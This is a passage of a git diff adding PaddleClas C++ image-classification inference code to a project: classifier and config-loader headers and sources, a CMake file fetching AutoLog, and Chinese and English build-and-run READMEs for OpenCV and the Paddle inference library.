+上述命令中,第一个参数(`D:\projects\PaddleClas\deploy\cpp_infer\tools\config.txt`)为配置文件路径,第二个参数(`.\docs\ILSVRC2012_val_00008306.JPEG`)为需要预测的图片路径。 + +注意,需要在配置文件中正确设置预测参数,包括所用模型文件的路径(`cls_model_path`和`cls_params_path`)。 + + +### 注意 +* 在Windows下的终端中执行文件exe时,可能会发生乱码的现象,此时需要在终端中输入`CHCP 65001`,将终端的编码方式由GBK编码(默认)改为UTF-8编码,更加具体的解释可以参考这篇博客:[https://blog.csdn.net/qq_35038153/article/details/78430359](https://blog.csdn.net/qq_35038153/article/details/78430359)。 +* 如果需要使用CPU预测,PaddlePaddle在Windows上仅支持avx的CPU预测,目前不支持noavx的CPU预测。 +* 在使用生成的`clas_system.exe`进行预测时,如提示`由于找不到paddle_fluid.dll,无法继续执行代码。重新安装程序可能会解决此问题`,请检查是否将Paddle预测库路径添加到系统环境变量,详见[Step1: 下载PaddlePaddle C++ 预测库 paddle_inference_install_dir](#step1-下载paddlepaddle-c-预测库-paddle_inference_install_dir) diff --git a/Smart_container/PaddleClas/deploy/cpp/external-cmake/auto-log.cmake b/Smart_container/PaddleClas/deploy/cpp/external-cmake/auto-log.cmake new file mode 100644 index 0000000..9be9c2f --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/external-cmake/auto-log.cmake @@ -0,0 +1,12 @@ +find_package(Git REQUIRED) +include(FetchContent) + +set(FETCHCONTENT_BASE_DIR "${CMAKE_CURRENT_BINARY_DIR}/third-party") + 
+FetchContent_Declare( + extern_Autolog + PREFIX autolog + GIT_REPOSITORY https://github.com/LDOUBLEV/AutoLog.git + GIT_TAG main +) +FetchContent_MakeAvailable(extern_Autolog) diff --git a/Smart_container/PaddleClas/deploy/cpp/include/cls.h b/Smart_container/PaddleClas/deploy/cpp/include/cls.h new file mode 100644 index 0000000..600cffb --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/include/cls.h @@ -0,0 +1,91 @@ +// Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+ +#pragma once + +#include "opencv2/core.hpp" +#include "opencv2/imgcodecs.hpp" +#include "opencv2/imgproc.hpp" +#include "paddle_inference_api.h" +#include +#include +#include +#include +#include + +#include +#include +#include + +#include + +using namespace paddle_infer; + +namespace PaddleClas { + +class Classifier { +public: + explicit Classifier(const std::string &model_path, + const std::string ¶ms_path, const bool &use_gpu, + const int &gpu_id, const int &gpu_mem, + const int &cpu_math_library_num_threads, + const bool &use_mkldnn, const bool &use_tensorrt, + const bool &use_fp16, const int &resize_short_size, + const int &crop_size) { + this->use_gpu_ = use_gpu; + this->gpu_id_ = gpu_id; + this->gpu_mem_ = gpu_mem; + this->cpu_math_library_num_threads_ = cpu_math_library_num_threads; + this->use_mkldnn_ = use_mkldnn; + this->use_tensorrt_ = use_tensorrt; + this->use_fp16_ = use_fp16; + + this->resize_short_size_ = resize_short_size; + this->crop_size_ = crop_size; + + LoadModel(model_path, params_path); + } + + // Load Paddle inference model + void LoadModel(const std::string &model_path, const std::string ¶ms_path); + + // Run predictor + double Run(cv::Mat &img, std::vector *times); + +private: + std::shared_ptr predictor_; + + bool use_gpu_ = false; + int gpu_id_ = 0; + int gpu_mem_ = 4000; + int cpu_math_library_num_threads_ = 4; + bool use_mkldnn_ = false; + bool use_tensorrt_ = false; + bool use_fp16_ = false; + + std::vector mean_ = {0.485f, 0.456f, 0.406f}; + std::vector scale_ = {1 / 0.229f, 1 / 0.224f, 1 / 0.225f}; + bool is_scale_ = true; + + int resize_short_size_ = 256; + int crop_size_ = 224; + + // pre-process + ResizeImg resize_op_; + Normalize normalize_op_; + Permute permute_op_; + CenterCropImg crop_op_; +}; + +} // namespace PaddleClas diff --git a/Smart_container/PaddleClas/deploy/cpp/include/cls_config.h b/Smart_container/PaddleClas/deploy/cpp/include/cls_config.h new file mode 100644 index 0000000..d74bb7b --- /dev/null +++ 
b/Smart_container/PaddleClas/deploy/cpp/include/cls_config.h @@ -0,0 +1,90 @@ +// Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +#pragma once + +#include +#include +#include +#include +#include +#include + +#include "include/utility.h" + +namespace PaddleClas { + +class ClsConfig { +public: + explicit ClsConfig(const std::string &config_file) { + config_map_ = LoadConfig(config_file); + + this->use_gpu = bool(stoi(config_map_["use_gpu"])); + + this->gpu_id = stoi(config_map_["gpu_id"]); + + this->gpu_mem = stoi(config_map_["gpu_mem"]); + + this->cpu_threads = stoi(config_map_["cpu_threads"]); + + this->use_mkldnn = bool(stoi(config_map_["use_mkldnn"])); + + this->use_tensorrt = bool(stoi(config_map_["use_tensorrt"])); + this->use_fp16 = bool(stoi(config_map_["use_fp16"])); + + this->cls_model_path.assign(config_map_["cls_model_path"]); + + this->cls_params_path.assign(config_map_["cls_params_path"]); + + this->resize_short_size = stoi(config_map_["resize_short_size"]); + + this->crop_size = stoi(config_map_["crop_size"]); + + this->benchmark = bool(stoi(config_map_["benchmark"])); + } + + bool use_gpu = false; + + int gpu_id = 0; + + int gpu_mem = 4000; + + int cpu_threads = 1; + + bool use_mkldnn = false; + + bool use_tensorrt = false; + bool use_fp16 = false; + bool benchmark = false; + + std::string cls_model_path; + + std::string cls_params_path; + + int resize_short_size = 256; + int 
crop_size = 224; + + void PrintConfigInfo(); + +private: + // Load configuration + std::map LoadConfig(const std::string &config_file); + + std::vector split(const std::string &str, + const std::string &delim); + + std::map config_map_; +}; + +} // namespace PaddleClas diff --git a/Smart_container/PaddleClas/deploy/cpp/include/preprocess_op.h b/Smart_container/PaddleClas/deploy/cpp/include/preprocess_op.h new file mode 100644 index 0000000..ea352aa --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/include/preprocess_op.h @@ -0,0 +1,56 @@ +// Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+ +#pragma once + +#include "opencv2/core.hpp" +#include "opencv2/imgcodecs.hpp" +#include "opencv2/imgproc.hpp" +#include +#include +#include +#include +#include + +#include +#include +#include + +using namespace std; + +namespace PaddleClas { + +class Normalize { +public: + virtual void Run(cv::Mat *im, const std::vector &mean, + const std::vector &scale, const bool is_scale = true); +}; + +// RGB -> CHW +class Permute { +public: + virtual void Run(const cv::Mat *im, float *data); +}; + +class CenterCropImg { +public: + virtual void Run(cv::Mat &im, const int crop_size = 224); +}; + +class ResizeImg { +public: + virtual void Run(const cv::Mat &img, cv::Mat &resize_img, int max_size_len); +}; + +} // namespace PaddleClas \ No newline at end of file diff --git a/Smart_container/PaddleClas/deploy/cpp/include/utility.h b/Smart_container/PaddleClas/deploy/cpp/include/utility.h new file mode 100644 index 0000000..8dc1524 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/include/utility.h @@ -0,0 +1,46 @@ +// Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+ +#pragma once + +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include + +#include "opencv2/core.hpp" +#include "opencv2/imgcodecs.hpp" +#include "opencv2/imgproc.hpp" + +namespace PaddleClas { + +class Utility { +public: + static std::vector ReadDict(const std::string &path); + + // template + // inline static size_t argmax(ForwardIterator first, ForwardIterator last) + // { + // return std::distance(first, std::max_element(first, last)); + // } +}; + +} // namespace PaddleClas \ No newline at end of file diff --git a/Smart_container/PaddleClas/deploy/cpp/readme.md b/Smart_container/PaddleClas/deploy/cpp/readme.md new file mode 100644 index 0000000..7494148 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/readme.md @@ -0,0 +1,234 @@ +# 服务器端C++预测 + +本教程将介绍在服务器端部署PaddleClas模型的详细步骤。 + + +## 1. 准备环境 + +### 运行准备 +- Linux环境,推荐使用docker。 +- Windows环境,目前支持基于`Visual Studio 2019 Community`进行编译;此外,如果您希望通过生成`sln解决方案`的方式进行编译,可以参考该文档:[https://zhuanlan.zhihu.com/p/145446681](https://zhuanlan.zhihu.com/p/145446681) + +* 该文档主要介绍基于Linux环境下的PaddleClas C++预测流程,如果需要在Windows环境下使用预测库进行C++预测,具体编译方法请参考[Windows下编译教程](./docs/windows_vs2019_build.md)。 + +### 1.1 编译opencv库 + +* 首先需要从opencv官网上下载在Linux环境下源码编译的包,以3.4.7版本为例,下载及解压缩命令如下: + +``` +wget https://github.com/opencv/opencv/archive/3.4.7.tar.gz +tar -xvf 3.4.7.tar.gz +``` + +最终可以在当前目录下看到`opencv-3.4.7/`的文件夹。 + +* 编译opencv,首先设置opencv源码路径(`root_path`)以及安装路径(`install_path`),`root_path`为下载的opencv源码路径,`install_path`为opencv的安装路径。在本例中,源码路径即为当前目录下的`opencv-3.4.7/`。 + +```shell +cd ./opencv-3.4.7 +export root_path=$PWD +export install_path=${root_path}/opencv3 +``` + +* 然后在opencv源码路径下,按照下面的方式进行编译。 + +```shell +rm -rf build +mkdir build +cd build + +cmake .. 
\ + -DCMAKE_INSTALL_PREFIX=${install_path} \ + -DCMAKE_BUILD_TYPE=Release \ + -DBUILD_SHARED_LIBS=OFF \ + -DWITH_IPP=OFF \ + -DBUILD_IPP_IW=OFF \ + -DWITH_LAPACK=OFF \ + -DWITH_EIGEN=OFF \ + -DCMAKE_INSTALL_LIBDIR=lib64 \ + -DWITH_ZLIB=ON \ + -DBUILD_ZLIB=ON \ + -DWITH_JPEG=ON \ + -DBUILD_JPEG=ON \ + -DWITH_PNG=ON \ + -DBUILD_PNG=ON \ + -DWITH_TIFF=ON \ + -DBUILD_TIFF=ON + +make -j +make install +``` + +* `make install`完成之后,会在该文件夹下生成opencv头文件和库文件,用于后面的PaddleClas代码编译。 + +以opencv3.4.7版本为例,最终在安装路径下的文件结构如下所示。**注意**:不同的opencv版本,下述的文件结构可能不同。 + +``` +opencv3/ +|-- bin +|-- include +|-- lib64 +|-- share +``` + +### 1.2 下载或者编译Paddle预测库 + +* 有2种方式获取Paddle预测库,下面进行详细介绍。 + +#### 1.2.1 预测库源码编译 +* 如果希望获取最新预测库特性,可以从Paddle github上克隆最新代码,源码编译预测库。 +* 可以参考[Paddle预测库官网](https://www.paddlepaddle.org.cn/documentation/docs/zh/develop/guides/05_inference_deployment/inference/build_and_install_lib_cn.html#id16)的说明,从github上获取Paddle代码,然后进行编译,生成最新的预测库。使用git获取代码方法如下。 + +```shell +git clone https://github.com/PaddlePaddle/Paddle.git +``` + +* 进入Paddle目录后,使用如下方法编译。 + +```shell +rm -rf build +mkdir build +cd build + +cmake .. 
\ + -DWITH_CONTRIB=OFF \ + -DWITH_MKL=ON \ + -DWITH_MKLDNN=ON \ + -DWITH_TESTING=OFF \ + -DCMAKE_BUILD_TYPE=Release \ + -DWITH_INFERENCE_API_TEST=OFF \ + -DON_INFER=ON \ + -DWITH_PYTHON=ON +make -j +make inference_lib_dist +``` + +更多编译参数选项可以参考Paddle C++预测库官网:[https://www.paddlepaddle.org.cn/documentation/docs/zh/develop/guides/05_inference_deployment/inference/build_and_install_lib_cn.html#id16](https://www.paddlepaddle.org.cn/documentation/docs/zh/develop/guides/05_inference_deployment/inference/build_and_install_lib_cn.html#id16)。 + + +* 编译完成之后,可以在`build/paddle_inference_install_dir/`文件下看到生成了以下文件及文件夹。 + +``` +build/paddle_inference_install_dir/ +|-- CMakeCache.txt +|-- paddle +|-- third_party +|-- version.txt +``` + +其中`paddle`就是之后进行C++预测时所需的Paddle库,`version.txt`中包含当前预测库的版本信息。 + +#### 1.2.2 直接下载安装 + +* [Paddle预测库官网](https://www.paddlepaddle.org.cn/documentation/docs/zh/develop/guides/05_inference_deployment/inference/build_and_install_lib_cn.html#id1)上提供了不同cuda版本的Linux预测库,可以在官网查看并选择合适的预测库版本,注意必须选择`develop`版本。 + + 以`ubuntu14.04_cuda9.0_cudnn7_avx_mkl`的`develop`版本为例,使用下述命令下载并解压: + + +```shell +wget https://paddle-inference-lib.bj.bcebos.com/latest-gpu-cuda9-cudnn7-avx-mkl/paddle_inference.tgz + +tar -xvf paddle_inference.tgz +``` + + +最终会在当前的文件夹中生成`paddle_inference/`的子文件夹。 + + +## 2 开始运行 + +### 2.1 将模型导出为inference model + +* 可以参考[模型导出](../../tools/export_model.py),导出`inference model`,用于模型预测。得到预测模型后,假设模型文件放在`inference`目录下,则目录结构如下。 + +``` +inference/ +|--cls_infer.pdmodel +|--cls_infer.pdiparams +``` +**注意**:上述文件中,`cls_infer.pdmodel`文件存储了模型结构信息,`cls_infer.pdiparams`文件存储了模型参数信息。注意两个文件的路径需要与配置文件`tools/config.txt`中的`cls_model_path`和`cls_params_path`参数对应一致。 + +### 2.2 编译PaddleClas C++预测demo + +* 编译命令如下,其中Paddle C++预测库、opencv等其他依赖库的地址需要换成自己机器上的实际地址。 + + +```shell +sh tools/build.sh +``` + +具体地,`tools/build.sh`中内容如下。 + +```shell +OPENCV_DIR=your_opencv_dir +LIB_DIR=your_paddle_inference_dir +CUDA_LIB_DIR=your_cuda_lib_dir +CUDNN_LIB_DIR=your_cudnn_lib_dir 
+TENSORRT_DIR=your_tensorrt_lib_dir + +BUILD_DIR=build +rm -rf ${BUILD_DIR} +mkdir ${BUILD_DIR} +cd ${BUILD_DIR} +cmake .. \ + -DPADDLE_LIB=${LIB_DIR} \ + -DWITH_MKL=ON \ + -DDEMO_NAME=clas_system \ + -DWITH_GPU=OFF \ + -DWITH_STATIC_LIB=OFF \ + -DWITH_TENSORRT=OFF \ + -DTENSORRT_DIR=${TENSORRT_DIR} \ + -DOPENCV_DIR=${OPENCV_DIR} \ + -DCUDNN_LIB=${CUDNN_LIB_DIR} \ + -DCUDA_LIB=${CUDA_LIB_DIR} \ + +make -j +``` + +上述命令中, + +* `OPENCV_DIR`为opencv编译安装的地址(本例中为`opencv-3.4.7/opencv3`文件夹的路径); + +* `LIB_DIR`为下载的Paddle预测库(`paddle_inference`文件夹),或编译生成的Paddle预测库(`build/paddle_inference_install_dir`文件夹)的路径; + +* `CUDA_LIB_DIR`为cuda库文件地址,在docker中为`/usr/local/cuda/lib64`; + +* `CUDNN_LIB_DIR`为cudnn库文件地址,在docker中为`/usr/lib/x86_64-linux-gnu/`。 + +* `TENSORRT_DIR`是tensorrt库文件地址,在dokcer中为`/usr/local/TensorRT6-cuda10.0-cudnn7/`,TensorRT需要结合GPU使用。 + +在执行上述命令,编译完成之后,会在当前路径下生成`build`文件夹,其中生成一个名为`clas_system`的可执行文件。 + + +### 运行demo +* 首先修改`tools/config.txt`中对应字段: + * use_gpu:是否使用GPU; + * gpu_id:使用的GPU卡号; + * gpu_mem:显存; + * cpu_math_library_num_threads:底层科学计算库所用线程的数量; + * use_mkldnn:是否使用MKLDNN加速; + * use_tensorrt: 是否使用tensorRT进行加速; + * use_fp16:是否使用半精度浮点数进行计算,该选项仅在use_tensorrt为true时有效; + * cls_model_path:预测模型结构文件路径; + * cls_params_path:预测模型参数文件路径; + * resize_short_size:预处理时图像缩放大小; + * crop_size:预处理时图像裁剪后的大小。 + +* 然后修改`tools/run.sh`: + * `./build/clas_system ./tools/config.txt ./docs/imgs/ILSVRC2012_val_00000666.JPEG` + * 上述命令中分别为:编译得到的可执行文件`clas_system`;运行时的配置文件`config.txt`;待预测的图像。 + +* 最后执行以下命令,完成对一幅图像的分类。 + +```shell +sh tools/run.sh +``` + +* 最终屏幕上会输出结果,如下图所示。 + +
+ +
+ + +其中`class id`表示置信度最高的类别对应的id,score表示图片属于该类别的概率。 diff --git a/Smart_container/PaddleClas/deploy/cpp/readme_en.md b/Smart_container/PaddleClas/deploy/cpp/readme_en.md new file mode 100644 index 0000000..fe5abe2 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/readme_en.md @@ -0,0 +1,240 @@ +# Server-side C++ inference + + +In this tutorial, we will introduce the detailed steps of deploying PaddleClas models on the server side. + + +## 1. Prepare the environment + +### Environment + +- Linux, docker is recommended. +- Windows, compilation based on `Visual Studio 2019 Community` is supported. In addition, you can refer to [How to use PaddleDetection to make a complete project](https://zhuanlan.zhihu.com/p/145446681) to compile by generating the `sln solution`. +- This document mainly introduces the compilation and inference of PaddleClas C++ in Linux environment. +- If you need to use the Inference Library in Windows environment, please refer to [The compilation tutorial in Windows](./docs/windows_vs2019_build.md) for detailed information. + + +### 1.1 Compile opencv + +* First of all, you need to download the source code compiled package in the Linux environment from the opencv official website. Taking opencv3.4.7 as an example, the download and uncompress command are as follows. + +``` +wget https://github.com/opencv/opencv/archive/3.4.7.tar.gz +tar -xf 3.4.7.tar.gz +``` + +Finally, you can see the folder of `opencv-3.4.7/` in the current directory. + +* Compile opencv, the opencv source path (`root_path`) and installation path (`install_path`) should be set by yourself. Among them, `root_path` is the downloaded opencv source code path, and `install_path` is the installation path of opencv. In this case, the opencv source is `./opencv-3.4.7`. + +```shell +cd ./opencv-3.4.7 +export root_path=$PWD +export install_path=${root_path}/opencv3 +``` + +* After entering the opencv source code path, you can compile it in the following way. 
+ + +```shell +rm -rf build +mkdir build +cd build + +cmake .. \ + -DCMAKE_INSTALL_PREFIX=${install_path} \ + -DCMAKE_BUILD_TYPE=Release \ + -DBUILD_SHARED_LIBS=OFF \ + -DWITH_IPP=OFF \ + -DBUILD_IPP_IW=OFF \ + -DWITH_LAPACK=OFF \ + -DWITH_EIGEN=OFF \ + -DCMAKE_INSTALL_LIBDIR=lib64 \ + -DWITH_ZLIB=ON \ + -DBUILD_ZLIB=ON \ + -DWITH_JPEG=ON \ + -DBUILD_JPEG=ON \ + -DWITH_PNG=ON \ + -DBUILD_PNG=ON \ + -DWITH_TIFF=ON \ + -DBUILD_TIFF=ON + +make -j +make install +``` + +* After `make install` is completed, the opencv header file and library file will be generated in this folder for later PaddleClas source code compilation. + +Take opencv3.4.7 for example, the final file structure under the opencv installation path is as follows. **NOTICE**:The following file structure may be different for different Versions of Opencv. + +``` +opencv3/ +|-- bin +|-- include +|-- lib64 +|-- share +``` + +### 1.2 Compile or download the Paddle Inference Library + +* There are 2 ways to obtain the Paddle Inference Library, described in detail below. + + +#### 1.2.1 Compile from the source code +* If you want to get the latest Paddle Inference Library features, you can download the latest code from Paddle GitHub repository and compile the inference library from the source code. +* You can refer to [Paddle Inference Library](https://www.paddlepaddle.org.cn/documentation/docs/en/develop/guides/05_inference_deployment/inference/build_and_install_lib_en.html#build-from-source-code) to get the Paddle source code from github, and then compile To generate the latest inference library. The method of using git to access the code is as follows. + + +```shell +git clone https://github.com/PaddlePaddle/Paddle.git +``` + +* After entering the Paddle directory, the compilation method is as follows. + +```shell +rm -rf build +mkdir build +cd build + +cmake .. 
\ + -DWITH_CONTRIB=OFF \ + -DWITH_MKL=ON \ + -DWITH_MKLDNN=ON \ + -DWITH_TESTING=OFF \ + -DCMAKE_BUILD_TYPE=Release \ + -DWITH_INFERENCE_API_TEST=OFF \ + -DON_INFER=ON \ + -DWITH_PYTHON=ON +make -j +make inference_lib_dist +``` + +For more compilation parameter options, please refer to the official website of the Paddle C++ inference library:[https://www.paddlepaddle.org.cn/documentation/docs/en/develop/guides/05_inference_deployment/inference/build_and_install_lib_en.html#build-from-source-code](https://www.paddlepaddle.org.cn/documentation/docs/en/develop/guides/05_inference_deployment/inference/build_and_install_lib_en.html#build-from-source-code). + + +* After the compilation process, you can see the following files in the folder of `build/paddle_inference_install_dir/`. + +``` +build/paddle_inference_install_dir/ +|-- CMakeCache.txt +|-- paddle +|-- third_party +|-- version.txt +``` + +Among them, `paddle` is the Paddle library required for C++ prediction later, and `version.txt` contains the version information of the current inference library. + + + +#### 1.2.2 Direct download and installation + +* Different cuda versions of the Linux inference library (based on GCC 4.8.2) are provided on the +[Paddle Inference Library official website](https://www.paddlepaddle.org.cn/documentation/docs/en/develop/guides/05_inference_deployment/inference/build_and_install_lib_en.html). You can view and select the appropriate version of the inference library on the official website. + +* Please select the `develop` version. + +* After downloading, use the following method to uncompress. + +``` +tar -xf paddle_inference.tgz +``` + +Finally you can see the following files in the folder of `paddle_inference/`. + + +## 2. Compile and run the demo + +### 2.1 Export the inference model + +* You can refer to [Model inference](../../tools/export_model.py),export the inference model. 
After the model is exported, assuming it is placed in the `inference` directory, the directory structure is as follows. + +``` +inference/ +|--cls_infer.pdmodel +|--cls_infer.pdiparams +``` + +**NOTICE**: Among them, `cls_infer.pdmodel` file stores the model structure information and the `cls_infer.pdiparams` file stores the model parameter information.The paths of the two files need to correspond to the parameters of `cls_model_path` and `cls_params_path` in the configuration file `tools/config.txt`. + +### 2.2 Compile PaddleClas C++ inference demo + + +* The compilation commands are as follows. The addresses of Paddle C++ inference library, opencv and other Dependencies need to be replaced with the actual addresses on your own machines. + +```shell +sh tools/build.sh +``` + +Specifically, the content in `tools/build.sh` is as follows. + +```shell +OPENCV_DIR=your_opencv_dir +LIB_DIR=your_paddle_inference_dir +CUDA_LIB_DIR=your_cuda_lib_dir +CUDNN_LIB_DIR=your_cudnn_lib_dir +TENSORRT_DIR=your_tensorrt_lib_dir + +BUILD_DIR=build +rm -rf ${BUILD_DIR} +mkdir ${BUILD_DIR} +cd ${BUILD_DIR} +cmake .. \ + -DPADDLE_LIB=${LIB_DIR} \ + -DWITH_MKL=ON \ + -DDEMO_NAME=clas_system \ + -DWITH_GPU=OFF \ + -DWITH_STATIC_LIB=OFF \ + -DWITH_TENSORRT=OFF \ + -DTENSORRT_DIR=${TENSORRT_DIR} \ + -DOPENCV_DIR=${OPENCV_DIR} \ + -DCUDNN_LIB=${CUDNN_LIB_DIR} \ + -DCUDA_LIB=${CUDA_LIB_DIR} \ + +make -j +``` + +In the above parameters of command: + +* `OPENCV_DIR` is the opencv installation path; + +* `LIB_DIR` is the download (`paddle_inference` folder) or the generated Paddle Inference Library path (`build/paddle_inference_install_dir` folder); + +* `CUDA_LIB_DIR` is the cuda library file path, in docker; it is `/usr/local/cuda/lib64`; + +* `CUDNN_LIB_DIR` is the cudnn library file path, in docker it is `/usr/lib/x86_64-linux-gnu/`. + +* `TENSORRT_DIR` is the tensorrt library file path,in dokcer it is `/usr/local/TensorRT6-cuda10.0-cudnn7/`,TensorRT is just enabled for GPU. 
+ +After the compilation is completed, an executable file named `clas_system` will be generated in the `build` folder. + + +### Run the demo +* First, please modify the `tools/config.txt` and `tools/run.sh`. + +* Some key words in `tools/config.txt` is as follows. + * use_gpu: Whether to use GPU. + * gpu_id: GPU id. + * gpu_mem:GPU memory. + * cpu_math_library_num_threads:Number of thread for math library acceleration. + * use_mkldnn:Whether to use mkldnn. + * use_tensorrt: Whether to use tensorRT. + * use_fp16:Whether to use Float16 (half precision), it is just enabled when use_tensorrt is set as 1. + * cls_model_path: Model path of inference model. + * cls_params_path: Params path of inference model. + * resize_short_size:Short side length of the image after resize. + * crop_size:Image size after center crop. + + +* Then execute the following command to complete the classification of an image. + +```shell +sh tools/run.sh +``` + +* The detection results will be shown on the screen, which is as follows. + +
+ +
+ +* In the above results,`class id` represents the id corresponding to the category with the highest confidence, and `score` represents the probability that the image belongs to that category. diff --git a/Smart_container/PaddleClas/deploy/cpp/src/cls.cpp b/Smart_container/PaddleClas/deploy/cpp/src/cls.cpp new file mode 100644 index 0000000..6ce09e7 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/src/cls.cpp @@ -0,0 +1,113 @@ +// Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +#include + +namespace PaddleClas { + +void Classifier::LoadModel(const std::string &model_path, + const std::string ¶ms_path) { + paddle_infer::Config config; + config.SetModel(model_path, params_path); + + if (this->use_gpu_) { + config.EnableUseGpu(this->gpu_mem_, this->gpu_id_); + if (this->use_tensorrt_) { + config.EnableTensorRtEngine( + 1 << 20, 1, 3, + this->use_fp16_ ? 
paddle_infer::Config::Precision::kHalf + : paddle_infer::Config::Precision::kFloat32, + false, false); + } + } else { + config.DisableGpu(); + if (this->use_mkldnn_) { + config.EnableMKLDNN(); + // cache 10 different shapes for mkldnn to avoid memory leak + config.SetMkldnnCacheCapacity(10); + } + config.SetCpuMathLibraryNumThreads(this->cpu_math_library_num_threads_); + } + + config.SwitchUseFeedFetchOps(false); + // true for multiple input + config.SwitchSpecifyInputNames(true); + + config.SwitchIrOptim(true); + + config.EnableMemoryOptim(); + config.DisableGlogInfo(); + + this->predictor_ = CreatePredictor(config); +} + +double Classifier::Run(cv::Mat &img, std::vector *times) { + cv::Mat srcimg; + cv::Mat resize_img; + img.copyTo(srcimg); + + auto preprocess_start = std::chrono::system_clock::now(); + this->resize_op_.Run(img, resize_img, this->resize_short_size_); + + this->crop_op_.Run(resize_img, this->crop_size_); + + this->normalize_op_.Run(&resize_img, this->mean_, this->scale_, + this->is_scale_); + std::vector input(1 * 3 * resize_img.rows * resize_img.cols, 0.0f); + this->permute_op_.Run(&resize_img, input.data()); + + auto input_names = this->predictor_->GetInputNames(); + auto input_t = this->predictor_->GetInputHandle(input_names[0]); + input_t->Reshape({1, 3, resize_img.rows, resize_img.cols}); + auto preprocess_end = std::chrono::system_clock::now(); + + auto infer_start = std::chrono::system_clock::now(); + input_t->CopyFromCpu(input.data()); + this->predictor_->Run(); + + std::vector out_data; + auto output_names = this->predictor_->GetOutputNames(); + auto output_t = this->predictor_->GetOutputHandle(output_names[0]); + std::vector output_shape = output_t->shape(); + int out_num = std::accumulate(output_shape.begin(), output_shape.end(), 1, + std::multiplies()); + + out_data.resize(out_num); + output_t->CopyToCpu(out_data.data()); + auto infer_end = std::chrono::system_clock::now(); + + auto postprocess_start = std::chrono::system_clock::now(); 
+ int maxPosition = + max_element(out_data.begin(), out_data.end()) - out_data.begin(); + auto postprocess_end = std::chrono::system_clock::now(); + + std::chrono::duration preprocess_diff = + preprocess_end - preprocess_start; + times->push_back(double(preprocess_diff.count() * 1000)); + std::chrono::duration inference_diff = infer_end - infer_start; + double inference_cost_time = double(inference_diff.count() * 1000); + times->push_back(inference_cost_time); + std::chrono::duration postprocess_diff = + postprocess_end - postprocess_start; + times->push_back(double(postprocess_diff.count() * 1000)); + + std::cout << "result: " << std::endl; + std::cout << "\tclass id: " << maxPosition << std::endl; + std::cout << std::fixed << std::setprecision(10) + << "\tscore: " << double(out_data[maxPosition]) << std::endl; + + return inference_cost_time; +} + +} // namespace PaddleClas diff --git a/Smart_container/PaddleClas/deploy/cpp/src/cls_config.cpp b/Smart_container/PaddleClas/deploy/cpp/src/cls_config.cpp new file mode 100644 index 0000000..309a470 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/src/cls_config.cpp @@ -0,0 +1,64 @@ +// Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+ +#include + +namespace PaddleClas { + +std::vector ClsConfig::split(const std::string &str, + const std::string &delim) { + std::vector res; + if ("" == str) + return res; + char *strs = new char[str.length() + 1]; + std::strcpy(strs, str.c_str()); + + char *d = new char[delim.length() + 1]; + std::strcpy(d, delim.c_str()); + + char *p = std::strtok(strs, d); + while (p) { + std::string s = p; + res.push_back(s); + p = std::strtok(NULL, d); + } + + return res; +} + +std::map +ClsConfig::LoadConfig(const std::string &config_path) { + auto config = Utility::ReadDict(config_path); + + std::map dict; + for (int i = 0; i < config.size(); i++) { + // pass for empty line or comment + if (config[i].size() <= 1 || config[i][0] == '#') { + continue; + } + std::vector res = split(config[i], " "); + dict[res[0]] = res[1]; + } + return dict; +} + +void ClsConfig::PrintConfigInfo() { + std::cout << "=======Paddle Class inference config======" << std::endl; + for (auto iter = config_map_.begin(); iter != config_map_.end(); iter++) { + std::cout << iter->first << " : " << iter->second << std::endl; + } + 